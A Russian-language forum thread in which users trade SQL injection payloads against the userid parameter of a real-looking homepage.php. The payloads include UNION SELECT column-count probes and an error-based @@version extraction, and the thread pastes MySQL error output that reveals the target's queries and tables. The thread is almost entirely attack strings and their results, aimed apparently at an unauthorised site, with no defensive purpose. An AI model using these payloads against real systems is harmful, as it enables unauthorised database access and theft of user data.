|
Участник форума
Регистрация: 08.01.2012
Сообщений: 129
С нами:
7549526
Репутация:
6
|
|
Сообщение от BigBear
Попробуй вот так:
Код:
/homepage.php?page=4&userid=1' union select 1,2,3,4,5 and 1='1
(подбирай кол-во полей в union практическим путём
или так
Код:
/homepage.php?page=4&userid=1' or @:=(@:=1)||@ group by concat((select @@version),!@)having@||min(@:=0) and 1='1
кол-во полей подобрать не смог
Сообщение от None
homepage.php?page=4&userid=1%27%20union%20select%2 01,2,3,4,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,3 6,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52, 53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69 ,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,8 6,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,1 02,103,104,105,106,107,108,109,110,111,112,113,114 ,115,116,117,118,119,120,121,122,123,124,125,126,1 27,128,129,130,131,132,133,134,135,136,137,138,139 ,140,141,142,143,144,145%20and%201='
всё время ошибка
Сообщение от None
MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Y' order by priority, title limit 2' at line 2, occured in query: "select * from bcs_wishlist,bcs_product where bcs_wishlist.product_id = bcs_product.product_id and userid = '1' union select 1' and make_public = 'Y' order by priority, title limit 2".
MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' order by bwcore_member.username limit 2' at line 3, occured in query: "select bwcore_member.username,bwcore_member.avatar_url,bc s_fav_vendor.* from bcs_fav_vendor,bwcore_member where bwcore_member.userid = bcs_fav_vendor.userid_vendor and bcs_fav_vendor.userid = '1' union select 1' order by bwcore_member.username limit 2".
побывал так
homepage.php?page=4&userid=1'+or+1=(select @@version)+and+1='1
ошибка исчезла но увы результат 0
|